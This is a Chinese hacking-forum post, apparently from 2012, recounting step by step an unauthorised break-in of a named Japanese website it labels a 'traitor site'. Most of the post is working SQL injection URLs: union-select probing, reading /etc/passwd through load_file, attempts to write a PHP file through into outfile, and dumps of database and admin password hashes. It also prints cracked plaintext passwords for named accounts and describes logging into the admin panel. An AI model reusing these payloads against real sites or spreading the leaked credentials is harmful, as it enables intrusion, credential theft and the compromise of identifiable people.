中国网络渗透测试联盟
标题:
原创 检测汉奸站全过程
[打印本页]
作者:
xiancda
时间:
2012-9-17 16:22
标题:
原创 检测汉奸站全过程
补:
www.zuaa.jp
测试
! H N3 ~" Q6 a
1 [" K$ K9 U' f
0x01. 检测
www.zuaa.jp
收集数据
% L2 Q* \ L6 J$ ]
[attach]73[/attach]
6 o% U2 x7 G5 H+ Z, {# Z( k
6 p2 i; y! C; N" X7 J/ q% x& J
whatweb
! E7 z/ O: K, y8 U
[attach]74[/attach]
j/ ?$ s0 M$ a0 F4 [
; j5 x9 Q. k: @/ v3 ]' _1 t$ ]
利用NMAP扫描
! k! v! e; L! g0 Y# }* o# U0 v
[attach]75[/attach]
" M5 a, d# v! y. W/ y6 w% O3 K6 {5 T' \/ `
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
+ k* ?! k* [" T; u) H: U
0x02.找注入点
% O9 {" J' N; J6 O/ z n R
找注入点:
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
; }2 f: M* ]' Y4 Q
[attach]76[/attach]
/ U+ ~# e" L% N4 D5 Z
; g9 u4 K1 i% x
0x03.order by
% w5 P. ^; u5 t
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
order by 1
. H0 C2 U5 u% ^" ^- f
[attach]77[/attach]
- q- V: n' z, G
order by 28报错,order by 27正常
# E. S" |$ l/ n+ y9 }
# \5 d* @/ ]! A" a
0x04. union手动查询
9 Y6 g l7 F% o, Z; H5 E+ b4 e
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
; ]/ \) A2 R% V* Q) ^+ p
添加到 27 时正常显示
% q7 Q: V8 e0 D" ` m
[attach]78[/attach]
/ J* Q5 O! [" f r5 T0 J9 j5 ^
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
+ p A; A2 c, F5 W% G7 d3 ^' K
8 L' C3 A- j7 n! g( c& I; K6 h
0x05. info:
+ @: k8 R2 F! U2 Q3 Z& g
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
% q6 s. S x9 p1 w4 Q; U
[attach]79[/attach]
1 f" j- Z: y, h3 F6 i7 V- Y# Y
user: root@localhost
: U! k! j6 i- x1 o; C! m8 x
database: openpne
5 C" Q( n" P, y
version: 4.1.22
4 h' }9 D4 A+ o0 j5 b
os: portbld-freebsd5.4
, i2 q0 h; W* ]7 l5 V
' P) x' ^5 @* ?4 }( |& K* M+ b) Z
0x06. root用户
- U' y6 k0 P) y$ U6 K% z
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
2 h0 x' ?; t- n* S. l; M. u
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
! P! ]. y$ M7 B j
[attach]80[/attach]
4 N; L. _0 S+ W
通过工具转换
! |+ \( s$ p" q) M
[attach]81[/attach]
) U4 G! q6 k8 f; Y5 z" d
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
! H; j- f8 b" ?: u6 g; ~4 N, _
0 S. f# U6 b5 b" R4 H& @
0x07. 利用 into outfile
# K2 S. J$ k- a# d& Z. U" ~9 v) B
全部都失败
' S$ M( a8 C; z8 `3 F/ ?7 E! W% M: o
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
# r2 u/ N8 s3 n+ d, c
7 V, J, s( P/ ?8 Z/ Q: o2 Y
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
4 d" [& M" v/ i7 z+ f: p
2 b6 _9 \" `$ w1 ]# ^( w
页面显示“MDB2 Error:syntax error”
* M5 q! _, G& n& o* g
' E8 B- x2 U! ^& V, k! y! K
0x08. 利用 mysql 4.1
; k0 R! U1 y: |
猜常规表名,字段未果 工具 sqlmap
. I5 }( k$ U: F( ]
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
8 o( y+ |% j3 N7 F
. {! g( n$ b# |1 Q4 ?$ H
[attach]82[/attach]
2 ^/ S# H) P8 V" `
: b' v6 j6 t, O! h3 I
0x09. 查找后台
: O8 k; x8 R, W
利用 现有的各种 后台工具尝试都不行
W, _" m+ J6 ~1 D
' s) j7 o ]& M- \! B9 Y
0x10. MySL外联方法
$ }2 n; }( ^0 |7 ?; W* L
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连
www.zuaa.jp
不行
' z9 |; o. k3 y0 _
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
3 D8 R) x6 Q; Z D7 Q
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
7 ^9 }4 y/ S+ [8 c2 o4 C$ v3 d
[attach]83[/attach]
# j. Q, |% L/ S
这个可以在
www.cmd5.com
解密
% ]* t5 M& F- l3 g
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
3 K( j4 k! r- o" ]7 c& E
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
- p: U, B8 A3 \% ~6 T! `4 N
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
2 @. q* h1 L ~+ Q+ i
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
! \% D) G7 J+ k# d5 u3 U9 Y1 Q' B! R
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
" l; w! _$ C7 d& |7 V
[attach]84[/attach]
) P6 x- U$ O6 z9 y2 ~: i
4 X! j+ U* L. o) C& i) R# M
0x11. 网站突破
; x' t! k9 [4 A k! t. s) @
发现网站的源程序 openpne, google 下载 openpne 源码
% ^3 N7 a0 q5 J, A+ O
[attach]85[/attach]
1 l e4 e2 d5 N3 E
" t4 I# e1 \1 s, Z6 B% g
0x12. 默认信息利用
' ~6 n J1 Z9 y) n- c0 P; _
http://sns.zuaa.jp/?m=admin&a=page_login
# _* h. b5 e/ Z" G/ w0 t5 d
[attach]86[/attach]
1 B4 _& P; b* Q# \/ o+ w8 \
表名 (c_admin_user) ,字段名(username,password)
& n8 D3 K4 n, o6 \1 o
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
T( e& I. Y0 b) Z. J
[attach]87[/attach]
2 |7 E6 ?7 }' p8 I$ S% B
解密
4 r! {& Q% F" e/ K( u6 l1 [+ |# a/ `
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
8 }9 E, |& X, r0 G
zuaajp:c0923ec5857796a393da99905008c176, zju1897
; _2 v1 I9 g1 q: h
( ]& {: z8 e$ d/ i) X4 `; c- t
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
X$ R a/ R5 ]8 W
( a5 o; v% @3 F0 g0 _6 ^+ K
0x13. 登录后台
: F+ K% ? M S. p
[attach]88[/attach]
* v9 {& z7 W: v- C. h* o1 R# w- {8 s
$ C# z4 H# h1 i! D5 |0 R
( m8 K1 h v" n2 f
0x14. 小结
- f' W8 H* R7 \# S$ }
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
4 M0 d7 W; \4 B% f# y( E7 L* }
感谢群 ----
渗透 -酷帅王子
提供注入点 提供注入点
% J7 g6 Y; V$ B9 @" V1 R( R( A
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------
By DarkRain
, ?( F4 X) @5 p. n2 {" g
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
3 T% H+ L/ I6 N7 H" `& i
. c' s4 U: o7 d1 R
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
u6 z) g# z1 _8 ^3 m6 A
作者:
荒村狂客
时间:
2012-9-19 08:27
哪个牛人 费的这劲 入侵的
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2